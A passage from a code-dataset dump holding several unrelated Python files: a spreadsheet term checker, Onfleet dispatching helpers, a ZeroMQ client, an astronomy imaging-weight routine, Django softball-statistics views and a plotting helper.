terms in spreadsheet\n\t\t\t@param dictionaryIndex\t- index of terms in dictionary\n\n\t\t\t@return\ttuple (Spreadsheet object, spreadsheet, dictionary)\n\t\t\"\"\"\n\t\t# Create and initialize Spreadsheet objects for the spreadsheet file and dictionary file\n\t\tfiles = [Spreadsheet(f) for f in [spreadsheetFile, dictionaryFile]]\n\n\t\tfor s in files:\n\t\t\ts.load()\n\t\t\ts.initialize()\n\n\t\t# Make both spreadsheet (generator) and dictionary (list) for the check method\n\t\tspreadsheet = (line[spreadsheetIndex].lower() for line in files[0].spreadsheet[1:])\n\t\tdictionary = [line[dictionaryIndex].lower() for line in files[1].spreadsheet if len(line[dictionaryIndex]) > 1]\n\n\t\treturn files[0], spreadsheet, dictionary\n\n\tdef check(self, SpreadsheetObject, spreadsheet, dictionary):\n\t\t\"\"\"\tcompare the spreadsheet list and the dictionary list\n\t\t\tfor any matches and record matches in a new column.\n\n\t\t\t@param\tSpreadsheetObject - Spreadsheet object to add new column to\n\t\t\t@param\tspreadsheet - list of terms from spreadsheet\n\t\t\t@param\tdictionary - list of terms from dictionary\n\n\t\t\t@return\tSpreadsheet object with new column added\n\t\t\"\"\"\n\t\t# Set new spreadsheet header\n\t\tSpreadsheetObject.spreadsheet[0] += [\"[C] In DICE Dict?\"]\n\n\t\t# Initiate index to 1 to skip spreadsheet header\n\t\tindex = 1\n\n\t\t# Loop through the spreadsheet to be check and check term against the dictionary if it is not blank\n\t\tfor row in spreadsheet:\n\n\t\t\t# If the row is blank then say \"EMPTY CELL\"\n\t\t\tif row.isspace():\n\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.EMPTY_CELL]\n\n\t\t\t# If the row is not blank check if term in row is in the dictionary\n\t\t\telse:\n\t\t\t\t#print(\"Checking row: {0}\".format(row))\n\t\t\t\t# If the term is in the dictionary, say \"IN DICT\"\n\t\t\t\tif row in dictionary:\n\t\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.IN_DICT]\n\t\t\t\t\tprint(\"Term in dictionary: {0}\".format(row))\t\n\n\t\t\t\t# If the term is not in the dictionary, say \"NOT IN DICT\"\n\t\t\t\telse:\n\t\t\t\t\tSpreadsheetObject.spreadsheet[index] += [self.NOT_IN_DICT]\n\n\t\t\t# Increment index\n\t\t\tindex += 1\n\n\t\treturn SpreadsheetObject\n\n\tdef save(self, spreadsheet, outputPath):\n\t\t\"\"\"\tmake spreadsheet (list of lists) into a string and save to path.\n\n\t\t\t@param\tspreadsheet: list containing rows as list\n\t\t\t@param\toutputPath: path to save directory\n\t\t\"\"\"\n\t\t# Convert list to string for saving\n\t\tspreadsheetColumnsAdded = ('\\t'.join(line) for line in spreadsheet)\n\t\tspreadsheetNewLinesAdded = '\\n'.join(spreadsheetColumnsAdded)\n\n\t\t# Save string to file specified in path\n\t\twriteOut = open(outputPath, 'w')\n\t\twriteOut.write(spreadsheetNewLinesAdded)\n\t\twriteOut.close()\n\nif __name__==\"__main__\":\n\t\"\"\" run as a script if this file is run as a stand-alone program\n\t\"\"\"\n\n\t# Path to spreadsheet file and dictionary files\n\tspreadsheetFile = \"C:\\\\Users\\\\a5rjqzz\\\\Desktop\\\\Excel\\\\20160318 tanner\\\\test.txt\"\n\tdictionaryFile = \"C:\\\\Users\\\\a5rjqzz\\\\Documents\\\\Variants\\\\20160321_variants.txt\"\n\n\t# Index to columns in the spreadsheet and dictionary to be compared\n\tspreadsheetFileColumnIndex = 0\n\tdictionaryFileColumnIndex = 0\n\n\t# Create CrosscheckDictionary object\n\tcd = CrosscheckDictionary(spreadsheetFile, dictionaryFile, spreadsheetFileColumnIndex, dictionaryFileColumnIndex)\n\n\t# Check and then save run\n\tcd.check(cd.spreadsheet, cd.spreadsheetIndex, cd.dictionaryIndex)\n\tcd.save(cd.spreadsheet, spreadsheetFile)","sub_path":"CrosscheckDictionary.py","file_name":"CrosscheckDictionary.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"291593658","text":"# -*- coding: utf-8 -*-\n\n'''\n - Dispatching APP.\n'''\nfrom django.conf import settings\nfrom snabb.dispatching.onfleet import Onfleet\nfrom snabb.geo_utils.utils import _get_real_eta\n\n\ndef _get_eta(lat, lon):\n on = Onfleet()\n workers = on._get_workers_by_location(lat, lon)\n\n small_vehicles = ['CAR', 'MOTORCYCLE', 'BICYCLE', 'TRUCK']\n medium_vehicles = ['CAR', 'MOTORCYCLE', 'BICYCLE', 'TRUCK']\n big_vehicles = ['CAR', 'TRUCK']\n\n small_eta = \"0\"\n medium_eta = \"0\"\n big_eta = \"0\"\n\n for worker in workers['workers']:\n worker_vehicle = worker['vehicle']['type']\n worker_lon = worker['location'][0]\n worker_lat = worker['location'][1]\n\n # Only workers onDuty without active task.\n if worker['onDuty'] and worker['activeTask'] is None:\n if worker_vehicle == 'BICYCLE':\n mode = 'bicycling'\n else:\n mode = 'driving'\n current_worker_eta = _get_real_eta(\n worker_lat,\n worker_lon,\n lat,\n lon,\n mode\n )\n if worker_vehicle in small_vehicles:\n if small_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n small_eta = current_worker_eta\n if worker_vehicle in medium_vehicles:\n if medium_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n medium_eta = current_worker_eta\n if worker_vehicle in big_vehicles:\n if big_eta == \"0\":\n # Only save if we don't have a better eta for this size.\n big_eta = current_worker_eta\n\n if small_eta != \"0\" and medium_eta != \"0\" and big_eta != \"0\":\n # If we have the three ETAs, we dont need any more info.\n break\n\n etas = {\n 'small': small_eta,\n 'medium': medium_eta,\n 'big': big_eta\n }\n return etas\n\n\n# Team related functions\ndef _create_team(team_name):\n on = Onfleet()\n new_team = on._create_team(team_name)\n return new_team\n\n\ndef _update_team(team_name, team_id):\n on = Onfleet()\n updated_team = on._update_team(team_name, team_id)\n return updated_team\n\n\ndef _delete_team(team_id):\n on = Onfleet()\n deleted_team = on._delete_team(team_id)\n return deleted_team\n\n\ndef _get_team_detail(team_id):\n on = Onfleet()\n detail_team = on._get_team_detail(team_id)\n return detail_team\n\n\ndef _get_all_teams():\n on = Onfleet()\n all_teams = on._get_all_teams()\n return all_teams\n\n\n# Courier related functions\ndef _create_worker(name, phone, teams):\n on = Onfleet()\n new_courier = on._create_worker(name, phone, teams)\n return new_courier\n\n\ndef _get_worker_detail(worker_id):\n on = Onfleet()\n detail_courier = on._get_worker_detail(worker_id)\n return detail_courier\n\n\ndef _update_worker(worker_id, name=None, teams=None):\n on = Onfleet()\n updated_courier = on._update_worker(worker_id, name, teams)\n return updated_courier\n\n\ndef _delete_worker(worker_id, name=None, teams=None):\n on = Onfleet()\n deleted_courier = on._delete_worker(worker_id, name, teams)\n return deleted_courier\n\n\ndef _get_all_workers():\n on = Onfleet()\n all_workers = on._get_all_workers()\n return all_workers\n\n\n# Tasks related functions\ndef _create_task(self, destination, recipients, notes, pickupTask=False,\n completeAfter=None, completeBefore=None, container=None,\n *args, **kwargs):\n on = Onfleet()\n new_task = on._create_task(destination,\n recipients, completeAfter,\n completeBefore, pickupTask,\n notes, container)\n return new_task\n\n\ndef _get_task_detail(task_id):\n on = Onfleet()\n detail_task = on._get_task_detail(task_id)\n return detail_task\n","sub_path":"snabb/dispatching/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224394689","text":"#!/usr/bin/python2.7\n\nimport zmq\n\ncontext = zmq.Context()\n\npullSocket = context.socket(zmq.PULL)\npullSocket.bind(\"tcp://*:42924\")\n\npushSocket = context.socket(zmq.PUSH)\npushSocket.connect(\"tcp://localhost:42923\")\n\nmessage = \"\"\n\npushSocket.send(\"addUser(Suwako,23)\")\npushSocket.send(\"displayMembers()\")\nprint(pullSocket.recv())\n\n","sub_path":"src/Client/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52410021","text":"# Copyright 2019 AUI, Inc. Washington DC, USA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\ndef make_imaging_weight(vis_dataset, imaging_weights_parms,storage_parms):\n \"\"\"\n Creates the imaging weight data variable that has dimensions time x baseline x chan x pol (matches the visibility data variable).\n The weight density can be averaged over channels or calculated independently for each channel using imaging_weights_parms['chan_mode'].\n The following imaging weighting schemes are supported 'natural', 'uniform', 'briggs', 'briggs_abs'.\n The imaging_weights_parms['imsize'] and imaging_weights_parms['cell'] should usually be the same values that will be used for subsequent synthesis blocks (for example making the psf).\n To achieve something similar to 'superuniform' weighting in CASA tclean imaging_weights_parms['imsize'] and imaging_weights_parms['cell'] can be varied relative to the values used in subsequent synthesis blocks.\n \n Parameters\n ----------\n vis_dataset : xarray.core.dataset.Dataset\n Input visibility dataset.\n imaging_weights_parms : dictionary\n imaging_weights_parms['weighting'] : {'natural', 'uniform', 'briggs', 'briggs_abs'}, default = natural\n Weighting scheme used for creating the imaging weights.\n imaging_weights_parms['imsize'] : list of int, length = 2\n The size of the grid for gridding the imaging weights. Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['cell'] : list of number, length = 2, units = arcseconds\n The size of the pixels in the fft of the grid (the image domain pixel size). Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['robust'] : number, acceptable range [-2,2], default = 0.5\n Robustness parameter for Briggs weighting.\n robust = -2.0 maps to uniform weighting.\n robust = +2.0 maps to natural weighting.\n imaging_weights_parms['briggs_abs_noise'] : number, default=1.0\n Noise parameter for imaging_weights_parms['weighting']='briggs_abs' mode weighting.\n imaging_weights_parms['chan_mode'] : {'continuum'/'cube'}, default = 'continuum'\n When 'cube' the weights are calculated independently for each channel (perchanweightdensity=True in CASA tclean) and when 'continuum' a common weight density is calculated for all channels.\n imaging_weights_parms['uvw_name'] : str, default ='UVW'\n The name of uvw data variable that will be used to grid the weights. Used when imaging_weights_parms['weighting'] is not 'natural'.\n imaging_weights_parms['data_name'] : str, default = 'DATA'\n The name of the visibility data variable whose dimensions will be used to construct the imaging weight data variable.\n imaging_weights_parms['imaging_weight_name'] : str, default ='IMAGING_WEIGHT'\n The name of that will be used for the imaging weight data variable.\n storage_parms : dictionary\n storage_parms['to_disk'] : bool, default = False\n If true the dask graph is executed and saved to disk in the zarr format.\n storage_parms['append'] : bool, default = False\n If storage_parms['to_disk'] is True only the dask graph associated with the function is executed and the resulting data variables are saved to an existing zarr file on disk.\n Note that graphs on unrelated data to this function will not be executed or saved.\n storage_parms['outfile'] : str\n The zarr file to create or append to.\n storage_parms['chunks_on_disk'] : dict of int, default = {}\n The chunk size to use when writing to disk. This is ignored if storage_parms['append'] is True. The default will use the chunking of the input dataset.\n storage_parms['chunks_return'] : dict of int, default = {}\n The chunk size of the dataset that is returned. The default will use the chunking of the input dataset.\n storage_parms['graph_name'] : str\n The time to compute and save the data is stored in the attribute section of the dataset and storage_parms['graph_name'] is used in the label.\n storage_parms['compressor'] : numcodecs.blosc.Blosc,default=Blosc(cname='zstd', clevel=2, shuffle=0)\n The compression algorithm to use. Available compression algorithms can be found at https://numcodecs.readthedocs.io/en/stable/blosc.html.\n \n Returns\n -------\n vis_dataset : xarray.core.dataset.Dataset\n The vis_dataset will contain a new data variable for the imaging weights the name is defined by the input parameter imaging_weights_parms['imaging_weight_name'].\n \"\"\"\n print('######################### Start make_imaging_weights #########################')\n import time\n import math\n import xarray as xr\n import dask.array as da\n import matplotlib.pylab as plt\n import dask.array.fft as dafft\n import dask\n import copy, os\n from numcodecs import Blosc\n from itertools import cycle\n import zarr\n \n from ngcasa._ngcasa_utils._store import _store\n from ngcasa._ngcasa_utils._check_parms import _check_storage_parms\n from ._imaging_utils._check_imaging_parms import _check_imaging_weights_parms\n from cngi.dio import write_zarr, append_zarr\n \n _imaging_weights_parms = copy.deepcopy(imaging_weights_parms)\n _storage_parms = copy.deepcopy(storage_parms)\n \n assert(_check_imaging_weights_parms(vis_dataset,_imaging_weights_parms)), \"######### ERROR: imaging_weights_parms checking failed\"\n assert(_check_storage_parms(_storage_parms,'dataset.vis.zarr','make_imaging_weights')), \"######### ERROR: storage_parms checking failed\"\n \n \n #Check if weight or weight spectrum present\n #If both default to weight spectrum\n #If none create new\n weight_present = 'WEIGHT' in vis_dataset.data_vars\n weight_spectrum_present = 'WEIGHT_SPECTRUM' in vis_dataset.data_vars\n all_dims_dict = vis_dataset.dims\n \n vis_data_dims = vis_dataset[_imaging_weights_parms['data_name']].dims\n vis_data_chunksize = vis_dataset[_imaging_weights_parms['data_name']].data.chunksize\n \n \n if weight_present and weight_spectrum_present:\n print('Both WEIGHT and WEIGHT_SPECTRUM data variables found, will use WEIGHT_SPECTRUM to calculate', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT_SPECTRUM,vis_dataset[_imaging_weights_parms['data_name']])\n elif weight_present:\n print('WEIGHT data variable found, will use WEIGHT to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT,vis_dataset[_imaging_weights_parms['data_name']])\n elif weight_spectrum_present:\n print('WEIGHT_SPECTRUM data variable found, will use WEIGHT_SPECTRUM to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = _match_array_shape(vis_dataset.WEIGHT_SPECTRUM,vis_dataset[_imaging_weights_parms['data_name']])\n else:\n print('No WEIGHT or WEIGHT_SPECTRUM data variable found, will assume all weights are unity to calculate ', _imaging_weights_parms['imaging_weight_name'])\n imaging_weight = da.ones(vis_dataset[_imaging_weights_parms['data_name']].shape,chunks=vis_data_chunksize)\n \n vis_dataset[_imaging_weights_parms['imaging_weight_name']] = xr.DataArray(imaging_weight, dims=vis_dataset[_imaging_weights_parms['data_name']].dims)\n \n if _imaging_weights_parms['weighting'] != 'natural':\n calc_briggs_weights(vis_dataset,_imaging_weights_parms)\n \n list_xarray_data_variables = [vis_dataset[_imaging_weights_parms['imaging_weight_name']]]\n return _store(vis_dataset,list_xarray_data_variables,_storage_parms)\n \ndef _match_array_shape(array_to_reshape,array_to_match):\n # Reshape in_weight to match dimnetionality of vis_data (vis_dataset[imaging_weights_parms['data_name']])\n # The order is assumed the same (there can be missing). array_to_reshape is a subset of array_to_match\n import dask.array as da\n import numpy as np\n \n match_array_chunksize = array_to_match.data.chunksize\n \n reshape_dims = np.ones(len(match_array_chunksize),dtype=int) #Missing dimentions will be added using reshape command\n tile_dims = np.ones(len(match_array_chunksize),dtype=int) #Tiling is used so that number of elements in each dimention match\n \n array_to_match_dims = array_to_match.dims\n array_to_reshape_dims = array_to_reshape.dims\n \n for i in range(len(match_array_chunksize)):\n if array_to_match_dims[i] in array_to_reshape_dims:\n reshape_dims[i] = array_to_match.shape[i]\n else:\n tile_dims[i] = array_to_match.shape[i]\n \n return da.tile(da.reshape(array_to_reshape.data,reshape_dims),tile_dims).rechunk(match_array_chunksize)\n\n\n\ndef calc_briggs_weights(vis_dataset,imaging_weights_parms):\n import dask.array as da\n import xarray as xr\n import numpy as np\n from ._imaging_utils._standard_grid import _graph_standard_grid, _graph_standard_degrid\n \n \n dtr = np.pi / (3600 * 180)\n grid_parms = {}\n \n grid_parms['chan_mode'] = imaging_weights_parms['chan_mode']\n grid_parms['imsize_padded'] = imaging_weights_parms['imsize'] #do not need to pad since no fft\n grid_parms['cell'] = imaging_weights_parms['cell']\n grid_parms['do_imaging_weight'] = True\n grid_parms['uvw_name'] = imaging_weights_parms['uvw_name']\n \n grid_parms['oversampling'] = 0\n grid_parms['support'] = 1\n grid_parms['do_psf'] = True\n grid_parms['complex_grid'] = False\n grid_parms['do_imaging_weight'] = True\n grid_parms['imaging_weight_name'] = imaging_weights_parms['imaging_weight_name']\n \n cgk_1D = np.ones((1))\n grid_of_imaging_weights, sum_weight = _graph_standard_grid(vis_dataset, cgk_1D, grid_parms)\n \n \n #############Calculate Briggs parameters#############\n def calculate_briggs_parms(grid_of_imaging_weights, sum_weight, imaging_weights_parms):\n if imaging_weights_parms['weighting'] == 'briggs':\n robust = imaging_weights_parms['robust']\n briggs_factors = np.ones((2,1,1)+sum_weight.shape)\n squared_sum_weight = (np.sum(grid_of_imaging_weights**2,axis=(0,1)))\n briggs_factors[0,0,0,:,:] = (np.square(5.0*10.0**(-robust))/(squared_sum_weight/sum_weight))[None,None,:,:]\n elif imaging_weights_parms['weighting'] == 'briggs_abs':\n robust = imaging_weights_parms['robust']\n briggs_factors = np.ones((2,1,1)+sum_weight.shape)\n briggs_factors[0,0,0,:,:] = briggs_factor[0,0,0,:,:]*np.square(robust)\n briggs_factors[1,0,0,:,:] = briggs_factor[1,0,0,:,:]*2.0*np.square(imaging_weights_parms['briggs_abs_noise'])\n else:\n briggs_factors = np.zeros((2,1,1)+sum_weight.shape)\n briggs_factors[0,0,0,:,:] = np.ones((1,1,1)+sum_weight.shape)\n \n return briggs_factors\n \n #Map blocks can be simplified by using new_axis and swapping grid_of_imaging_weights and sum_weight\n briggs_factors = da.map_blocks(calculate_briggs_parms,grid_of_imaging_weights,sum_weight, imaging_weights_parms,chunks=(2,1,1)+sum_weight.chunksize,dtype=np.double)[:,0,0,:,:]\n \n imaging_weight = _graph_standard_degrid(vis_dataset, grid_of_imaging_weights, briggs_factors, cgk_1D, grid_parms)\n \n vis_dataset[imaging_weights_parms['imaging_weight_name']] = xr.DataArray(imaging_weight, dims=vis_dataset[imaging_weights_parms['data_name']].dims)\n \n\n","sub_path":"ngcasa/imaging/make_imaging_weight.py","file_name":"make_imaging_weight.py","file_ext":"py","file_size_in_byte":12045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"620898172","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .models import Stats\n# from .models import Polls\n\nimport pandas as pd\nimport re\nfrom .management import methods\nimport json\nfrom collections import Counter, OrderedDict\n\nfrom .management import config as cfg\ncfg = cfg.Config\nimport time\n\n\n# Create your views here.\ndef index(request):\n # Converting db to df\n db_stats = Stats.objects.all().filter(season = cfg.CURRENT_SEASON, player__in = cfg.CURRENT_SEASON_ROSTER)\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n\n\n db_for_sel = Stats.objects.all()\n df_for_sel = pd.DataFrame(list(db_for_sel.values()))\n df_for_sel =df_for_sel.drop(\"id\",1)\n df_for_sel.columns = cfg.COLUMN_NAMES\n df_for_sel = df_for_sel[cfg.COLUMN_NAMES_ORDER]\n\n df_plot = methods.Softball_Methods.plot_data(df)\n\n # Getting season stats\n df_season = methods.Softball_Methods.season_stats(df)\n\n df_table = df_season.to_html(index=False,classes='table table-striped table-bordered table-hover table-responsive\" id=\"table-custom-sort')\n\n count = 0\n cat_list = []\n new_table = \"\"\n for line in df_table.split(\"\\n\"):\n m_th = re.search(\"\", line)\n m_td = re.search(\"\", line)\n m_tr = re.search(\"\", line)\n if (m_tr):\n count = 0\n elif (m_th):\n cat_list.append(line.replace(\"\",\"\").replace(\"\",\"\").replace(\" \",\"\"))\n elif (m_td):\n line = line.replace(\"\",\"\")\n count += 1\n new_table = new_table + line+\"\\n\"\n\n\n # high charts data\n '''\n array of dictionary objects.\n [{name: \"Game1\", data[all game 1 ops data]},{}]\n '''\n series = []\n roster = sorted(cfg.CURRENT_SEASON_ROSTER)\n dates = list(sorted(set(df_plot[\"Date\"].tolist())))\n for date in dates:\n df_temp = df_plot[df_plot[\"Date\"] == date]\n df_temp = df_temp.sort_values(by=[\"Player\"])\n series.append({\"name\":str(date),\"data\":df_temp[\"OPS\"].tolist()})\n\n\n # polls = Polls.objects.all().values()\n # poll = polls[len(polls)-1]\n context = {\n 'table': new_table,\n 'current_season': cfg.CURRENT_SEASON,\n 'seasons': [\"All\"]+sorted(list(set(df_for_sel[\"Season\"].tolist()))),\n 'players': [\"All\"] + sorted(list(set(df_for_sel[df_for_sel[\"Season\"] == cfg.CURRENT_SEASON][\"Player\"].tolist())), ),\n 'games': [\"All\"]+sorted(list(set(df_for_sel[df_for_sel[\"Season\"]==cfg.CURRENT_SEASON][\"Date\"].apply(lambda x: str(x)).tolist()))),\n 'dataType': \"OPS\",\n 'rosterCats': roster,\n 'seriesData': series,\n }\n # 'pollQuestion': poll[\"question\"],\n # 'possibilities': list(poll[\"poss\"])\n return(render(request, 'softball/index2.html',context))\n\ndef index_updates(request):\n params = request.GET\n season = params[\"season\"]\n game = params[\"game\"]\n player = params[\"player\"]\n\n db_stats = Stats.objects.all()\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df_self = df\n\n if season != \"All\":\n df = df[df[\"Season\"]==season]\n if game != \"All\":\n df[\"Date\"] = df[\"Date\"].apply(lambda x: str(x))\n df = df[df[\"Date\"] == game]\n if player != \"All\":\n df = df[df[\"Player\"]==player]\n\n if season == \"All\" and game == \"All\" and player==\"All\":\n df_season = df.drop(\"Season\", 1)\n df_season = df_season.groupby([\"Player\"]).sum().reset_index()\n df_season = df_season[df_season[\"Games\"]>5]\n df_season = methods.Softball_Methods.stats_calc(df_season)\n elif game != \"All\":\n df_season = methods.Softball_Methods.stats_calc(df)\n df_season = df_season[df_season[\"Games\"]==1]\n elif player != \"All\":\n df_season = methods.Softball_Methods.game_stats(df)\n else:\n df_season = methods.Softball_Methods.season_stats(df)\n\n\n df_table = df_season.to_html(index=False,classes='table table-striped table-bordered table-hover table-responsive\" id=\"table-custom-sort')\n count = 0\n cat_list = []\n new_table = \"\"\n for line in df_table.split(\"\\n\"):\n m_th = re.search(\"\", line)\n m_td = re.search(\"\", line)\n m_tr = re.search(\"\", line)\n if (m_tr):\n count = 0\n elif (m_th):\n cat_list.append(line.replace(\"\",\"\").replace(\"\",\"\").replace(\" \",\"\"))\n elif (m_td):\n line = line.replace(\"\",\"\")\n count += 1\n new_table = new_table + line+\"\\n\"\n\n context = {\n \"table\": new_table,\n 'seasons': [\"All\"] + sorted(list(set(df_self[\"Season\"].tolist()))),\n 'players': [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Player\"].tolist()))),\n 'games': [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Date\"].apply(lambda x: str(x)).tolist()))),\n 'current_season': season,\n 'current_players': player,\n 'current_game': game,\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\ndef change_season(request):\n params = request.GET\n season = params[\"season\"]\n\n db_stats = Stats.objects.all()\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df_self = df\n\n context = {\n \"game_list\": [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Date\"].apply(lambda x: str(x)).tolist())))\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\ndef player_dash(request):\n params = request.GET\n name = params['name']\n db_stats = Stats.objects.all().filter(player=name)\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df = methods.Softball_Methods.stats_calc(df)\n df = df.sort_values(by='Date')\n\n pa = df[\"PA\"].sum()\n bb = df[\"BB\"].sum()\n fb = df[\"1B\"].sum()\n sb = df[\"2B\"].sum()\n tb = df[\"3B\"].sum()\n fourb = df[\"4B\"].sum()\n hr = df[\"HR\"].sum()\n outs = pa - (bb+fb+sb+tb+fourb+hr)\n\n pie_chart = [\n {\"text\":\"Out\",\"value\":(outs/pa)*100,\"color\":\"rgb(255, 144, 144)\",},\n {\"text\":\"Walk\",\"value\":(bb/pa)*100,\"color\":\"white\",},\n {\"text\":\"1B\",\"value\":(fb/pa)*100,\"color\":\"rgba(144,153,255,1)\",},\n {\"text\":\"2B\",\"value\":(sb/pa)*100,\"color\":\"rgb(255, 144, 248)\",},\n {\"text\":\"3B\",\"value\":(tb/pa)*100,\"color\":\"rgb(255, 225, 144)\",},\n {\"text\":\"4B\",\"value\":(fourb/pa)*100,\"color\":\"rgb(157, 255, 144)\",},\n {\"text\":\"HR\",\"value\":(hr/pa)*100,\"color\":\"rgb(144, 255, 233)\",},\n ]\n\n pie_chart = [x for x in pie_chart if x[\"value\"]>0]\n\n df_bands = df.drop_duplicates(['Date'])\n season_color = ['rgba(68, 170, 213, .2)','rgba(68, 100, 213, .2)','rgba(68, 170, 213, .2)','rgba(68, 100, 213, .2)']\n start = -.5\n bands = []\n season = \"\"\n counter = 0\n color_counter = 0\n for index,row in df_bands.iterrows():\n if index == 0:\n season = row[\"Season\"]\n counter = 1\n elif season == row[\"Season\"]:\n counter = counter +1\n else:\n bands.append( {\"from\": start, \"to\": start+counter, \"color\": season_color[color_counter]})\n start = counter + start\n counter = 1\n color_counter +=1\n season = row[\"Season\"]\n bands.append({\"from\": start, \"to\": start + counter, \"color\": season_color[color_counter]})\n\n df = df[df[\"OPS\"]>0]\n\n player_game_stat_data = [{\"name\":name,\"data\":df[\"OPS\"].tolist()}]\n player_game_stat_cat = [str(x) for x in df[\"Date\"].tolist()]\n\n context = {\n \"player_game_stat_data\": player_game_stat_data,\n \"player_game_stat_cat\": player_game_stat_cat,\n \"player_game_stat_bands\": bands,\n \"pie_chart\":pie_chart\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\n\ndef submit_poll(request):\n # print(request)\n # polls = Polls.objects.all().values()\n # poll = polls[len(polls)-1]\n #\n # overwrite_polls = Polls.object.all().filter(question=polls[\"question\"])\n # print(overwrite_polls)\n pass\n\ndef poll_chart(request):\n pass\n\n\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\nfrom .serializer import StatsSerializer\n\n@api_view(['GET', 'POST'])\n@permission_classes((permissions.AllowAny,))\ndef all_stats(request):\n if request.method == 'GET':\n w = Stats.objects.all()\n serializer = StatsSerializer(w, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = StatsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\ndef consistency(request):\n context ={}\n return(render(request, 'softball/consistency.html',context))\n","sub_path":"softball/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"393434575","text":"\"\"\"Context Processor для подразделения\"\"\"\r\nfrom Settings.models import Division\r\n\r\n\r\ndef division_context_processor(request):\r\n \"\"\"Добавляем поразделение в контекстный процессор\"\"\"\r\n try:\r\n return {'division': Division.objects.get(pk=request.session['division'])}\r\n except KeyError:\r\n return {'division': 'None'}\r\n","sub_path":"Socialservicegit/tools/division_context_processor.py","file_name":"division_context_processor.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488404447","text":"import matplotlib.pyplot as plt\nimport random\n\n'''\n对几个数组绘制折线图\n'''\ndef plot_data(x=[], data=[[]], labels=[], title = \"T=???\", show=False):\n\t#计算需要的中间变量\n\tcount = len(data)\n\tif count == 0:\n\t\tprint(\"待绘制数据为空!\")\n\t\treturn\n\tif labels==[]:\n\t\tprint(\"自动生成数据的labels\")\n\t\tfor i in range(count):\n\t\t\tlabels += [\"%04d\"%i]\n\tif count!=len(labels):\n\t\tprint(\"数据名称和数据数组个数不符,无法绘制\")\n\t\treturn\n\tlength = []\n\talldata = []\n\tfor i in range(count):\n\t\tlength += [len(data[i])]\n\t\talldata += data[i]\n\tdataMin = min(alldata)\n\tdataMax = max(alldata)\t\n\tlenMax = max(length)\n\t#生成颜色数据\n\tif count<=7:\n\t\tcolors=\"bgryckm\"\n\telse:\n\t\tcolors = []\n\t\tfor i in range(count):\n\t\t\trandom.seed()\n\t\t\t(r,g,b)=random.randint(0,0x7f), random.randint(0x7f,0xff), random.randint(0,0xff)\n\t\t\tif i%3==0:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(r,g,b)]\n\t\t\tif i%3==1:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(b,r,g)]\n\t\t\tif i%3==2:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(g,b,r)]\n\t#折线图初始化配置\t\n\tplt.rcParams['font.sans-serif'] = ['SimHei'] # for Chinese characters\n\tplt.rcParams['axes.unicode_minus']=False #用来正常显示负号\n\tfig,ax = plt.subplots()\n\tplt.title(title)\n\tplt.grid(True)\n\t#定义x, y的坐标轴\n\tax.set_ylim([dataMin-(dataMax-dataMin)*0.1,dataMax+(dataMax-dataMin)*0.1]) \n\tif x==[] or len(x)!=lenMax:\n\t\tx= range(lenMax)\n\t#绘制\n\tfor i in range(count):\n\t\tplt.plot(x[0:length[i]], data[i], \"o-\",label=labels[i], color=colors[i])\n\tplt.legend(loc='best')\n\tplt.close(0)\n\tif 